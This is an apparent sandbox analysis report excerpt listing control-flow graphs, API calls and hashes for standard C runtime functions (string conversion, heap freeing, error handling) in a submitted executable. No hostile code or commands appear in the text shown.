                                                                                                                                                                                • Opcode Fuzzy Hash: 5b5b35e8295c1fdf7dfe9758c52d2790036aff1ed820bc4701fcd1dc182e3731
                                                                                                                                                                                • Instruction Fuzzy Hash: CA11B976600148FFCB41EF96DC42CDD3B65EF54756F0140A6BE188F162DA35EE98AB80

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 165 f57ab4-f57acd 166 f57ae3-f57ae8 165->166 167 f57acf-f57adf call f582cc 165->167 169 f57af5-f57b19 MultiByteToWideChar 166->169 170 f57aea-f57af2 166->170 167->166 174 f57ae1 167->174 172 f57cac-f57cbf call f5123a 169->172 173 f57b1f-f57b2b 169->173 170->169 175 f57b2d-f57b3e 173->175 176 f57b7f 173->176 174->166 179 f57b40-f57b4f call f5ac20 175->179 180 f57b5d-f57b63 175->180 178 f57b81-f57b83 176->178 183 f57ca1 178->183 184 f57b89-f57b9c MultiByteToWideChar 178->184 179->183 193 f57b55-f57b5b 179->193 182 f57b64 call f562ff 180->182 186 f57b69-f57b6e 182->186 188 f57ca3-f57caa call f5646a 183->188 184->183 187 f57ba2-f57bbd call f55a15 184->187 186->183 190 f57b74 186->190 187->183 197 f57bc3-f57bca 187->197 188->172 194 f57b7a-f57b7d 190->194 193->194 194->178 198 f57c04-f57c10 197->198 199 f57bcc-f57bd1 197->199 200 f57c12-f57c23 198->200 201 f57c5c 198->201 199->188 202 f57bd7-f57bd9 199->202 203 f57c25-f57c34 call f5ac20 200->203 204 f57c3e-f57c44 200->204 205 f57c5e-f57c60 201->205 202->183 206 f57bdf-f57bf9 call f55a15 202->206 210 f57c9a-f57ca0 call f5646a 203->210 219 f57c36-f57c3c 203->219 208 f57c45 call f562ff 204->208 209 f57c62-f57c7b call f55a15 205->209 205->210 206->188 218 f57bff 206->218 216 f57c4a-f57c4f 208->216 209->210 222 f57c7d-f57c84 209->222 210->183 216->210 221 f57c51 216->221 218->183 223 f57c57-f57c5a 219->223 221->223 224 f57c86-f57c87 222->224 225 f57cc0-f57cc6 222->225 223->205 226 f57c88-f57c98 WideCharToMultiByte 224->226 225->226 226->210 227 f57cc8-f57ccf call f5646a 226->227 227->188
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00F554C8,00000000,?,?,?,00F57D05,?,?,00000100), ref: 00F57B0E
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00F57B46
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00F57D05,?,?,00000100,5EFC4D8B,?,?), ref: 00F57B94
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00F57C2B
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F57C8E
                                                                                                                                                                                • __freea.LIBCMT ref: 00F57C9B
                                                                                                                                                                                  • Part of subcall function 00F562FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F57E5B,?,00000000,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD), ref: 00F56331
                                                                                                                                                                                • __freea.LIBCMT ref: 00F57CA4
                                                                                                                                                                                • __freea.LIBCMT ref: 00F57CC9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2597970681-0
                                                                                                                                                                                • Opcode ID: 6178fbdb137b2128f74bee268f86b62282c5cc9cf4769965a3e94dbaec2e4798
                                                                                                                                                                                • Instruction ID: fe44ea9a3aca3e0f8e6fd2d694cb9bf9ed3e7c5d1fbfb049f948b859423a6d7b
                                                                                                                                                                                • Opcode Fuzzy Hash: 6178fbdb137b2128f74bee268f86b62282c5cc9cf4769965a3e94dbaec2e4798
                                                                                                                                                                                • Instruction Fuzzy Hash: 6251F472A14306AFDB25AF64EC45FAF77AAEB40762F154228FE04D7140EB34DC48E690

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 230 f58417-f58474 GetConsoleCP 231 f585b7-f585c9 call f5123a 230->231 232 f5847a-f58496 230->232 233 f584b1-f584c2 call f56052 232->233 234 f58498-f584af 232->234 241 f584c4-f584c7 233->241 242 f584e8-f584ea 233->242 236 f584eb-f584fa call f572b7 234->236 236->231 246 f58500-f58520 WideCharToMultiByte 236->246 244 f584cd-f584df call f572b7 241->244 245 f5858e-f585ad 241->245 242->236 244->231 253 f584e5-f584e6 244->253 245->231 246->231 248 f58526-f5853c WriteFile 246->248 250 f585af-f585b5 GetLastError 248->250 251 f5853e-f5854f 248->251 250->231 251->231 252 f58551-f58555 251->252 254 f58557-f58575 WriteFile 252->254 255 f58583-f58586 252->255 253->246 254->250 256 f58577-f5857b 254->256 255->232 257 f5858c 255->257 256->231 258 f5857d-f58580 256->258 257->231 258->255
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F58B8C,?,00000000,?,00000000,00000000), ref: 00F58459
                                                                                                                                                                                • __fassign.LIBCMT ref: 00F584D4
                                                                                                                                                                                • __fassign.LIBCMT ref: 00F584EF
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F58515
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00F58B8C,00000000,?,?,?,?,?,?,?,?,?,00F58B8C,?), ref: 00F58534
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,00F58B8C,00000000,?,?,?,?,?,?,?,?,?,00F58B8C,?), ref: 00F5856D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                • Opcode ID: 5c42195d30c74e7bf6249861646815497289454d607d24ecc655d0c98b8d7a8c
                                                                                                                                                                                • Instruction ID: 4267ae037a2e44574b777426cd5e22e0efb0cf87a87716ca9183b960e35db352
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c42195d30c74e7bf6249861646815497289454d607d24ecc655d0c98b8d7a8c
                                                                                                                                                                                • Instruction Fuzzy Hash: 37519171E002499FDB10CFA8D885AEEBBF4FF18312F18411AEA55F7291E7709945DB60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 259 f51e00-f51e51 call f5ac80 call f51dc0 call f52377 266 f51e53-f51e65 259->266 267 f51ead-f51eb0 259->267 268 f51ed0-f51ed9 266->268 270 f51e67-f51e7e 266->270 267->268 269 f51eb2-f51ebf call f52360 267->269 275 f51ec4-f51ecd call f51dc0 269->275 272 f51e94 270->272 273 f51e80-f51e8e call f52300 270->273 274 f51e97-f51e9c 272->274 282 f51ea4-f51eab 273->282 283 f51e90 273->283 274->270 277 f51e9e-f51ea0 274->277 275->268 277->268 280 f51ea2 277->280 280->275 282->275 284 f51e92 283->284 285 f51eda-f51ee3 283->285 284->274 286 f51ee5-f51eec 285->286 287 f51f1d-f51f2d call f52340 285->287 286->287 289 f51eee-f51efd call f5aac0 286->289 293 f51f41-f51f5d call f51dc0 call f52320 287->293 294 f51f2f-f51f3e call f52360 287->294 295 f51eff-f51f17 289->295 296 f51f1a 289->296 294->293 295->296 296->287
                                                                                                                                                                                APIs
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00F51E37
                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00F51E3F
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00F51EC8
                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00F51EF3
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00F51F48
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                • Opcode ID: 77b4778565c68951632bf709d8d5dab8192a269005d8a24eb796dec7fef4dae2
                                                                                                                                                                                • Instruction ID: 8243faf1e24ec31c0d1de92974d495423a82231bb3dcd8610175751e6e7029a7
                                                                                                                                                                                • Opcode Fuzzy Hash: 77b4778565c68951632bf709d8d5dab8192a269005d8a24eb796dec7fef4dae2
                                                                                                                                                                                • Instruction Fuzzy Hash: B941D234E002089BCF10DF28CC85B9EBBB5BF45366F148195EE149B292D735BD09EB91

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 305 f5621b-f56226 306 f562fc-f562fe 305->306 307 f5622c-f562f9 call f561df * 5 call f54869 * 3 call f561df * 5 call f54869 * 4 305->307 307->306
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00F561DF: _free.LIBCMT ref: 00F56208
                                                                                                                                                                                • _free.LIBCMT ref: 00F56269
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F56274
                                                                                                                                                                                • _free.LIBCMT ref: 00F5627F
                                                                                                                                                                                • _free.LIBCMT ref: 00F562D3
                                                                                                                                                                                • _free.LIBCMT ref: 00F562DE
                                                                                                                                                                                • _free.LIBCMT ref: 00F562E9
                                                                                                                                                                                • _free.LIBCMT ref: 00F562F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                • Instruction ID: 27cc497727082d72544d6e5fe1ef3df394c3d1c614edfdedafe9716dc5229e5d
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                • Instruction Fuzzy Hash: 25115171540B14AAD520B7B1CC07FDB77AC5F40B02F804825BFBAEB193DA69BA4C6690

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 342 f523d1-f523d8 343 f523dd-f523f8 GetLastError call f526a4 342->343 344 f523da-f523dc 342->344 347 f52411-f52413 343->347 348 f523fa-f523fc 343->348 349 f52457-f52462 SetLastError 347->349 348->349 350 f523fe-f5240f call f526df 348->350 350->347 353 f52415-f52425 call f53f67 350->353 356 f52427-f52437 call f526df 353->356 357 f52439-f52449 call f526df 353->357 356->357 363 f5244b-f5244d 356->363 362 f5244f-f52456 call f53ec5 357->362 362->349 363->362
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00F523C8,00F5209F,00F51AFC), ref: 00F523DF
                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F523ED
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F52406
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00F523C8,00F5209F,00F51AFC), ref: 00F52458
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                • Opcode ID: 4e9f7a40603a4945ab00321cd0f81b33bea69a3d4bb3a3a4999ccc711f957670
                                                                                                                                                                                • Instruction ID: 09d15863a91ebe7cc0613944402026ca5a654a1d8727024252d97725f4715407
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e9f7a40603a4945ab00321cd0f81b33bea69a3d4bb3a3a4999ccc711f957670
                                                                                                                                                                                • Instruction Fuzzy Hash: 0401D83260C7196FAA9467B86C856273754EB037B77200339FF20810E6EF554C897180

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 366 f54424-f54438 GetLastError 367 f54446-f5444b 366->367 368 f5443a-f54444 call f55904 366->368 369 f5444d call f5480c 367->369 368->367 375 f5448f-f5449a SetLastError 368->375 371 f54452-f54458 369->371 373 f54463-f54471 call f5595a 371->373 374 f5445a 371->374 381 f54476-f5448d call f54296 call f54869 373->381 382 f54473-f54474 373->382 376 f5445b-f54461 call f54869 374->376 383 f5449b-f544a7 SetLastError call f53f24 376->383 381->375 381->383 382->376
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000008,?,00F56D69,?,?,?,00F604C8,0000002C,00F53F34,00000016,00F5209F,00F51AFC), ref: 00F54428
                                                                                                                                                                                • _free.LIBCMT ref: 00F5445B
                                                                                                                                                                                • _free.LIBCMT ref: 00F54483
                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00F54490
                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00F5449C
                                                                                                                                                                                • _abort.LIBCMT ref: 00F544A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                • Opcode ID: e9d9bf0b9057ef6b7fccaa10f24356c3d8f32241df395ed8659e88fb79738d0c
                                                                                                                                                                                • Instruction ID: a742ab745980a75119b4d6c135ec24dd331ca30abcc3b31fa266f572e0d3512a
                                                                                                                                                                                • Opcode Fuzzy Hash: e9d9bf0b9057ef6b7fccaa10f24356c3d8f32241df395ed8659e88fb79738d0c
                                                                                                                                                                                • Instruction Fuzzy Hash: B0F02D32944740B6C611F7346C19B2B36696FC27B7B254414FF38D31D5EF68988D7111

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 390 f536fc-f53724 GetModuleHandleExW 391 f53726-f53739 GetProcAddress 390->391 392 f53749-f5374d 390->392 395 f53748 391->395 396 f5373b-f53746 391->396 393 f5374f-f53752 FreeLibrary 392->393 394 f53758-f53765 call f5123a 392->394 393->394 395->392 396->395
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F536AD,?,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002), ref: 00F5371C
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F5372F
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00F536AD,?,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002,00000000), ref: 00F53752
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: 5f3838dbf72665493cdb641223783e9a3f6b5511fa1b1e87fbb03d5b9a741cc4
                                                                                                                                                                                • Instruction ID: 9839ee986b28259b0084f6bd688a07909e9993bf5ad8740d2f361644aa93360d
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f3838dbf72665493cdb641223783e9a3f6b5511fa1b1e87fbb03d5b9a741cc4
                                                                                                                                                                                • Instruction Fuzzy Hash: 7EF03C71A0420CBBCB119B94EC49BAEBFB4EF08753F044064EE05A2190DB709A48EA90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 400 f5634d-f56372 call f53f72 403 f56374-f5637c 400->403 404 f5637f-f563a5 MultiByteToWideChar 400->404 403->404 405 f56444-f56448 404->405 406 f563ab-f563b7 404->406 409 f56454-f56469 call f5123a 405->409 410 f5644a-f5644d 405->410 407 f56403 406->407 408 f563b9-f563ca 406->408 411 f56405-f56407 407->411 412 f563e5-f563eb 408->412 413 f563cc-f563db call f5ac20 408->413 410->409 415 f5643d-f56443 call f5646a 411->415 416 f56409-f5642b call f520b0 MultiByteToWideChar 411->416 418 f563ec call f562ff 412->418 413->415 427 f563dd-f563e3 413->427 415->405 416->415 429 f5642d-f5643b GetStringTypeW 416->429 423 f563f1-f563f6 418->423 423->415 424 f563f8 423->424 428 f563fe-f56401 424->428 427->428 428->411 429->415
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00F554C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00F5639A
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00F563D2
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F56423
                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F56435
                                                                                                                                                                                • __freea.LIBCMT ref: 00F5643E
                                                                                                                                                                                  • Part of subcall function 00F562FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F57E5B,?,00000000,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD), ref: 00F56331
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1857427562-0
                                                                                                                                                                                • Opcode ID: 79c0fceee8ce62a698d1eb8b97a9430eb53c0f67362aa1ed26dfeadfb96e6b16
                                                                                                                                                                                • Instruction ID: 76147189e6933c4a4e90226a16ac523c3087971f8fd1adb69e98fe467f572e26
                                                                                                                                                                                • Opcode Fuzzy Hash: 79c0fceee8ce62a698d1eb8b97a9430eb53c0f67362aa1ed26dfeadfb96e6b16
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31E372A0020AABDF25DF64DC45DAE7BA5EF00322F444128FD24D7250E735CD59EBA0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 430 f5561e-f55633 GetEnvironmentStringsW 431 f55635-f55655 call f555e7 WideCharToMultiByte 430->431 432 f5568b 430->432 431->432 438 f55657 431->438 433 f5568d-f5568f 432->433 435 f55691-f55692 FreeEnvironmentStringsW 433->435 436 f55698-f556a0 433->436 435->436 439 f55658 call f562ff 438->439 440 f5565d-f55662 439->440 441 f55664-f55678 WideCharToMultiByte 440->441 442 f55680 440->442 441->442 443 f5567a-f5567e 441->443 444 f55682-f55689 call f54869 442->444 443->444 444->433
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00F55627
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5564A
                                                                                                                                                                                  • Part of subcall function 00F562FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F57E5B,?,00000000,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD), ref: 00F56331
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F55670
                                                                                                                                                                                • _free.LIBCMT ref: 00F55683
                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F55692
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2278895681-0
                                                                                                                                                                                • Opcode ID: 30bb2942c62dee4a813fd33d329b11c139718e1564da1d4c7c6dd3a2a131595c
                                                                                                                                                                                • Instruction ID: 6f1570187b7deb14da9ee7bab34f141edb17c9de7170f05fc5046ad879e4bcac
                                                                                                                                                                                • Opcode Fuzzy Hash: 30bb2942c62dee4a813fd33d329b11c139718e1564da1d4c7c6dd3a2a131595c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1501B172A01A997F27211AB65C6CC7B7AADDEC2FB33560129FF14CB140EB608C05A1B0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 447 f544a8-f544bf GetLastError 448 f544c1-f544cb call f55904 447->448 449 f544cd-f544d2 447->449 448->449 454 f5451e-f54525 SetLastError 448->454 451 f544d4 call f5480c 449->451 453 f544d9-f544df 451->453 455 f544e1 453->455 456 f544ea-f544f8 call f5595a 453->456 458 f54527-f5452c 454->458 459 f544e2-f544e8 call f54869 455->459 463 f544fd-f54513 call f54296 call f54869 456->463 464 f544fa-f544fb 456->464 465 f54515-f5451c SetLastError 459->465 463->454 463->465 464->459 465->458
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00F547FE,00F57E79,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD,?,00000000), ref: 00F544AD
                                                                                                                                                                                • _free.LIBCMT ref: 00F544E2
                                                                                                                                                                                • _free.LIBCMT ref: 00F54509
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F54516
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F5451F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
